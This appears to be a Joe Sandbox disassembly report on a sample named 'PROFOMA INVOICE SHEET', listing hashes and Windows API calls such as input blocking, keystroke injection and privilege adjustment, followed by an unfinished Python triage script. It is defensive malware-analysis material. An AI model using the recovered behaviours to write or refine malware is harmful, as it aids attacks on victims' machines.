                                    • Opcode ID: 5393aa0f1a977849555c0e7afd997abce35f4711288db407b8ff237805af0b55
                                    • Instruction ID: 3876d0ebba750a79a824b2cef77946f307fefabeeb6bd1f5a69ff1082e45145d
                                    • Opcode Fuzzy Hash: 5393aa0f1a977849555c0e7afd997abce35f4711288db407b8ff237805af0b55
                                    • Instruction Fuzzy Hash: C531B574911228ABCB22DF64DC8979DB7B8BF08310F5041EAE41CA7261E7749F858F45
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 003751DA
                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00375238
                                    • SetErrorMode.KERNEL32(00000000), ref: 003752A1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DiskFreeSpace
                                    • String ID:
                                    • API String ID: 1682464887-0
                                    • Opcode ID: 8184611b4984349db1a63b55efbeee3c8a86cd7ff21d22251c44a77f6b4bbec7
                                    • Instruction ID: 4a5c10eed4fdc2287e6601e737e474dc9f3c53f41700767756f4064d136b74b3
                                    • Opcode Fuzzy Hash: 8184611b4984349db1a63b55efbeee3c8a86cd7ff21d22251c44a77f6b4bbec7
                                    • Instruction Fuzzy Hash: 7E318075A10518DFDB01DF54D884EADBBB4FF09314F048499E809AF3A2CB35E846CB51
                                    APIs
                                      • Part of subcall function 0031FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00320668
                                      • Part of subcall function 0031FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00320685
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0036170D
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0036173A
                                    • GetLastError.KERNEL32 ref: 0036174A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                    • String ID:
                                    • API String ID: 577356006-0
                                    • Opcode ID: 5d88b219e42fa8e28c4e14a9199eb48e3a6386276169c10ff75e22008c9f32ad
                                    • Instruction ID: 4b1be824d3a6bc03ed886f94e54e07d00552adc31dc86106d0220117823bbc41
                                    • Opcode Fuzzy Hash: 5d88b219e42fa8e28c4e14a9199eb48e3a6386276169c10ff75e22008c9f32ad
                                    • Instruction Fuzzy Hash: 7D11BCB2410204AFD719AF54EC86DAAB7BDEB08714B24852EE05656285EB70FC81CB20
                                    APIs
                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0036D608
                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0036D645
                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0036D650
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle
                                    • String ID:
                                    • API String ID: 33631002-0
                                    • Opcode ID: 0e6411dd87a00eac1263d4f4a5efe20fd9c878b6a6945016b8c0bd5c3d5dd692
                                    • Instruction ID: 62bfb9b1ee3e2b68315ad92d2aea69bf1337d9695d71b6e17177c173b9d91e9b
                                    • Opcode Fuzzy Hash: 0e6411dd87a00eac1263d4f4a5efe20fd9c878b6a6945016b8c0bd5c3d5dd692
                                    • Instruction Fuzzy Hash: E5116175E05228BFDB118F95DC45FAFBFBCEB45B50F108116F904E7294D6704A058BA1
                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0036168C
                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003616A1
                                    • FreeSid.ADVAPI32(?), ref: 003616B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                    • String ID:
                                    • API String ID: 3429775523-0
                                    • Opcode ID: a98a995f7a766c9b62a7a6383ac5709eb41557dbd3ef302410432c55cdbe3b83
                                    • Instruction ID: d0329955a1ca397dcd28b8cf632e80fbffaf3ea9c567e2ace7e57222941eaf72
                                    • Opcode Fuzzy Hash: a98a995f7a766c9b62a7a6383ac5709eb41557dbd3ef302410432c55cdbe3b83
                                    • Instruction Fuzzy Hash: 3EF04471950308FBDB00DFE0CC89AAEBBBCEB08300F404561E900E2281E331EA048A50
                                    APIs
                                    • GetCurrentProcess.KERNEL32(003328E9,?,00324CBE,003328E9,003C88B8,0000000C,00324E15,003328E9,00000002,00000000,?,003328E9), ref: 00324D09
                                    • TerminateProcess.KERNEL32(00000000,?,00324CBE,003328E9,003C88B8,0000000C,00324E15,003328E9,00000002,00000000,?,003328E9), ref: 00324D10
                                    • ExitProcess.KERNEL32 ref: 00324D22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: 623e340410d4615f4ee50cb22c8e290b559a8eba09867bc1b1edb1b8e94c9602
                                    • Instruction ID: 6dc12c0c03ac6f601723375809cce8bbb1629a483de5bced112a0d9acc6d50e8
                                    • Opcode Fuzzy Hash: 623e340410d4615f4ee50cb22c8e290b559a8eba09867bc1b1edb1b8e94c9602
                                    • Instruction Fuzzy Hash: DBE0B635010158AFCF13AF54EE4AA583B6DEB41B81F118015FC098B123CB3ADD42CA90
                                    APIs
                                    • GetUserNameW.ADVAPI32(?,?), ref: 0035D28C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: NameUser
                                    • String ID: X64
                                    • API String ID: 2645101109-893830106
                                    • Opcode ID: d9ff61f19b5a74a727c40c7afe6c7cec6274dc0b7ff0860f0a518cfd9339c172
                                    • Instruction ID: 34046a9705f2fe7bbd820bf5990f040ed018488947b7f6d16990e8ee82679b0c
                                    • Opcode Fuzzy Hash: d9ff61f19b5a74a727c40c7afe6c7cec6274dc0b7ff0860f0a518cfd9339c172
                                    • Instruction Fuzzy Hash: 61D0C9B481111DEECB95CB90DC88DDDB37CBB08305F100552F506A2500D77095488F20
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                    • Instruction ID: 8ca1f75bd878d8576c2686ed8afefb26ece3e7caee616cc2d9722e8ebb81a7b4
                                    • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                    • Instruction Fuzzy Hash: BD022C71E102299BDF15CFA9D9806ADFBF1EF48314F25816AD819EB384D731AE41CB80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Variable is not of type 'Object'.$p#=
                                    • API String ID: 0-163314492
                                    • Opcode ID: eda620322b4eeb32055b4c6e7e32db423a0cac39d4bf0fb6a6a461eb88fccdd6
                                    • Instruction ID: f6ba926b3efcae9774691029002cfa467463ab19533b121b8a7b4bf4407e513e
                                    • Opcode Fuzzy Hash: eda620322b4eeb32055b4c6e7e32db423a0cac39d4bf0fb6a6a461eb88fccdd6
                                    • Instruction Fuzzy Hash: F932AD70911208DBDF1ADF94C8A1BEDB7B9BF05304F214159E806AF2D2DB32AD4ACB51
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 00376918
                                    • FindClose.KERNEL32(00000000), ref: 00376961
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: 4b18e8bd42a6d17a22454e5e4bbd8244c378a5b56bcbbab589db0ed7baaf8d41
                                    • Instruction ID: 2d0380af36cc88eb3b2e63024fa1e5a28c86d1a9338a5ca4d6217131a56072cd
                                    • Opcode Fuzzy Hash: 4b18e8bd42a6d17a22454e5e4bbd8244c378a5b56bcbbab589db0ed7baaf8d41
                                    • Instruction Fuzzy Hash: EC11E2716146019FC711CF29C895A16BBE4FF85328F05C699F5698F7A2CB34EC05CB91
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00384891,?,?,00000035,?), ref: 003737E4
                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00384891,?,?,00000035,?), ref: 003737F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: 9f845f9984832eb3ddf679344f8e9769305d92f7b376ed6e96c6c6dc9363fee4
                                    • Instruction ID: d6012b5803a6b041b99cdf8b59d7bc6f04b3701c2fe4ca8aa511f999d77f7068
                                    • Opcode Fuzzy Hash: 9f845f9984832eb3ddf679344f8e9769305d92f7b376ed6e96c6c6dc9363fee4
                                    • Instruction Fuzzy Hash: FAF0E5B16052282AEB2257668C8DFEB3BAEEFC4761F000266F509D2281D9609944C6B0
                                    APIs
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0036B25D
                                    • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0036B270
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: InputSendkeybd_event
                                    • String ID:
                                    • API String ID: 3536248340-0
                                    • Opcode ID: ef9afdd74bd43ac77d134c31085389da5d4305bbd7db988e47b8ce2b51730a84
                                    • Instruction ID: 98dc0ca999d19090fd413a20dd75d9cc7d6db66a9234ab8f0b7ae00714f51903
                                    • Opcode Fuzzy Hash: ef9afdd74bd43ac77d134c31085389da5d4305bbd7db988e47b8ce2b51730a84
                                    • Instruction Fuzzy Hash: 06F06D7080428DABDB068FA0C805BAEBBB4FF04305F00840AF951A5192C37982119F94
                                    APIs
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003611FC), ref: 003610D4
                                    • CloseHandle.KERNEL32(?,?,003611FC), ref: 003610E9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: AdjustCloseHandlePrivilegesToken
                                    • String ID:
                                    • API String ID: 81990902-0
                                    • Opcode ID: 5fc1e546bdde8a9f7b5cab17287baa57a475b441ed9e867d5308cea9794f4118
                                    • Instruction ID: 4f1a819c83be2de65097d60a5096046678b8122b1538618f90d4ef186b11849c
                                    • Opcode Fuzzy Hash: 5fc1e546bdde8a9f7b5cab17287baa57a475b441ed9e867d5308cea9794f4118
                                    • Instruction Fuzzy Hash: 2DE0BF72018650AEE7262B51FC05EB777ADEB04310F14882EF5A5844B5DB62ACE0DB60
                                    APIs
                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00336766,?,?,00000008,?,?,0033FEFE,00000000), ref: 00336998
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ExceptionRaise
                                    • String ID:
                                    • API String ID: 3997070919-0
                                    • Opcode ID: 2be409ba35c989abcfe51de8c37470fe6e4a8b2419a375ac771b7e249a21aef6
                                    • Instruction ID: 7901a53f09a4e26adaec799a9d75cc1c252b76739f4ce86e2bc41c17c99f77b0
                                    • Opcode Fuzzy Hash: 2be409ba35c989abcfe51de8c37470fe6e4a8b2419a375ac771b7e249a21aef6
                                    • Instruction Fuzzy Hash: 8FB11A71610609AFD716CF28C4CAB657BE0FF49364F26C658E899CF2A2C735E991CB40
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-3916222277
                                    • Opcode ID: b02b37dc13245ba3fdc1f0f6e547ef6ed1e523568e9d4e7cea91e4539f72e52c
                                    • Instruction ID: 5c651944311107612890420fa209f767f1d3418fa88ceb6be8bb608bed7f314d
                                    • Opcode Fuzzy Hash: b02b37dc13245ba3fdc1f0f6e547ef6ed1e523568e9d4e7cea91e4539f72e52c
                                    • Instruction Fuzzy Hash: 851260759002299FDB16CF59C880AEEB7F5FF48710F15819AE849EB251EB309E85CF90
                                    APIs
                                    • BlockInput.USER32(00000001), ref: 0037EABD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: BlockInput
                                    • String ID:
                                    • API String ID: 3456056419-0
                                    • Opcode ID: 27c6d600d32f6c657d7a9e6813dbb36a95bd73e6ffa2a304b578ef1e9a127ae8
                                    • Instruction ID: 1e2fb596d04460624608a0d69c5ba13b3a4de9cac73a7ffa2d21e8e4261fb874
                                    • Opcode Fuzzy Hash: 27c6d600d32f6c657d7a9e6813dbb36a95bd73e6ffa2a304b578ef1e9a127ae8
                                    • Instruction Fuzzy Hash: CBE01A312202049FC711EF59D814E9AF7EDAF98760F008456FC49CB291DA74A8408B91
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,003203EE), ref: 003209DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 86f64141ac0f2b66d83816b6a2f952a9e95e2716ccaffaac4b80b1a617f096b2
                                    • Instruction ID: 311a25640c4a1b376b040390d529fffe228ccaef2538fce0631827240be48182
                                    • Opcode Fuzzy Hash: 86f64141ac0f2b66d83816b6a2f952a9e95e2716ccaffaac4b80b1a617f096b2
                                    • Instruction Fuzzy Hash:
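The "APIs" entries in these function records all share one line shape, `<Api>.<MODULE>(<args>), ref: <address>`, where `?` stands for an argument the plugin could not resolve. What an analyst wants from them is a per-function capability summary and a decode of the few arguments that carry meaning (the `00000001` passed to BlockInput is `fBlockIt = TRUE`; `00001000` in the first FormatMessageW argument is `FORMAT_MESSAGE_FROM_SYSTEM`; `C000000D` in RaiseException is `STATUS_INVALID_PARAMETER`; `0000001C` as SendInput's third argument is `sizeof(INPUT)` on 32-bit Windows). The script below is an added example written for this page, not Joe Sandbox code. The API lines in `REPORT_EXCERPT` are copied from the records above; the capability tags, the watch list and the function names are the editor's own choices for the example.

```python
import re

# Parser and triage helper for the "APIs" entries of a Joe Sandbox IDA-plugin
# function listing. Added example, not Joe Sandbox code.
# Handled line shape:  "• <Api>.<MODULE>(<args>), ref: <hex address>"
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Capability tag per API. This mapping is the editor's choice for the example.
CAPABILITIES = {
    "BlockInput": "blocks_user_input",
    "SendInput": "synthesizes_input",
    "keybd_event": "synthesizes_input",
    "AdjustTokenPrivileges": "modifies_token_privileges",
    "SetUnhandledExceptionFilter": "replaces_exception_filter",
    "RaiseException": "raises_exception",
    "FindFirstFileW": "enumerates_files",
    "FindClose": "enumerates_files",
    "GetLastError": "formats_error_text",
    "FormatMessageW": "formats_error_text",
    "CloseHandle": "closes_handle",
}

FORMAT_MESSAGE_FROM_SYSTEM = 0x1000   # winbase.h
STATUS_INVALID_PARAMETER = 0xC000000D # ntstatus.h
SIZEOF_INPUT_X86 = 0x1C               # sizeof(INPUT) on 32-bit Windows

# API lines copied from the function records in this report section; the
# "APIs" headers mark function boundaries exactly as the report does.
REPORT_EXCERPT = """\
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00376918
• FindClose.KERNEL32(00000000), ref: 00376961
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00384891,?,?,00000035,?), ref: 003737E4
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00384891,?,?,00000035,?), ref: 003737F4
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0036B25D
• keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0036B270
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003611FC), ref: 003610D4
• CloseHandle.KERNEL32(?,?,003611FC), ref: 003610E9
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00336766,?,?,00000008,?,?,0033FEFE,00000000), ref: 00336998
APIs
• BlockInput.USER32(00000001), ref: 0037EABD
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,003203EE), ref: 003209DA
"""


def parse_report(text):
    """Split the listing at each 'APIs' header; return one dict per function."""
    functions, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"calls": []}
            functions.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            current["calls"].append({
                "api": m.group("api"), "module": m.group("module"),
                "args": args, "ref": int(m.group("ref"), 16),
            })
    return functions


def _hex(arg):
    """Parse '00001000' to an int; '?' and symbolic arguments give None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def triage(func):
    """Tag a function's capabilities and decode the arguments that matter."""
    tags = sorted({CAPABILITIES[c["api"]] for c in func["calls"] if c["api"] in CAPABILITIES})
    notes = []
    for c in func["calls"]:
        a = c["args"]
        if c["api"] == "BlockInput" and a and _hex(a[0]) == 1:
            notes.append("BlockInput(TRUE) at %08X: keyboard and mouse input blocked" % c["ref"])
        elif c["api"] == "FormatMessageW" and a and _hex(a[0]) is not None \
                and _hex(a[0]) & FORMAT_MESSAGE_FROM_SYSTEM:
            notes.append("FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM): GetLastError rendered as text")
        elif c["api"] == "RaiseException" and a and _hex(a[0]) == STATUS_INVALID_PARAMETER:
            notes.append("RaiseException(STATUS_INVALID_PARAMETER) at %08X" % c["ref"])
        elif c["api"] == "SendInput" and len(a) >= 3 and _hex(a[2]) == SIZEOF_INPUT_X86:
            notes.append("SendInput cbSize=0x1C matches the 32-bit INPUT structure")
        elif c["api"] == "AdjustTokenPrivileges":
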